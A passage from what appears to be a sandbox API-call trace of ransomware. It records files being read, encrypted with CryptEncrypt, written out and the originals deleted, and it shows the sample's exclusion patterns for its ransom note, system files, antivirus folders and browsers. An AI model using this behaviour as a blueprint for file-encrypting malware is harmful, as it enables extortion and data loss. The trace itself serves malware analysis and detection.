pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.380] GetLastError () returned 0x0 [0166.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.380] GetLastError () returned 0x0 [0166.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.380] GetLastError () returned 0x0 [0166.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.380] GetLastError () returned 0x0 [0166.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.381] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.381] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.381] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.381] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.381] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.381] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.381] GetLastError () returned 0x0 [0166.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.382] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.382] GetLastError () returned 0x0 [0166.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.382] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.382] GetLastError () returned 0x0 [0166.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.382] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.382] GetLastError () returned 0x0 [0166.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.382] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.382] GetLastError () returned 0x0 [0166.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x60, lpOverlapped=0x0) returned 1 [0166.382] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x60, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0166.382] GetLastError () returned 0x0 [0166.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0166.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf")) returned 0x20 [0166.383] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf", dwFileAttributes=0x20) returned 0 [0166.383] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf") returned 1 [0166.383] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf")) returned 0 [0166.383] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" [0166.383] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.383] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd7b.tmp")) returned 0xfd7b [0166.384] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd7b.tmp"), dwFlags=0x1) returned 0 [0166.385] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd7b.tmp")) returned 1 [0166.385] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0166.385] wcslen (_String="OK") returned 0x2 [0166.385] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.385] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.385] CryptDestroyKey (hKey=0x9ad138) returned 1 [0166.385] CryptDestroyHash (hHash=0x9ad278) returned 1 [0166.385] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0166.385] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*NMCRYPT") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*Recovers your files.html") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.exe") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.dll") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.lnk") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.bat") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.ini") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.msi") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*.scf") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*pagefile.sys*") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*AppData*") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\winrar\\*") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\java\\*") returned 0 [0166.385] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\windows\\*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\ESET\\*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\AVG\\*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*Atheros*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*Realtek*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*bootmgr*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*boot*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*boot*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*IO.SYS*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*ntldr*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*chrome*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*opera*") returned 0 [0166.386] PathMatchSpecW (pszFile="White_Chocolate.jpg", pszSpec="*firefox*") returned 0 [0166.386] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg", pszSpec="*") returned 1 [0166.386] strlen (_Str="NMoreira") returned 0x8 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 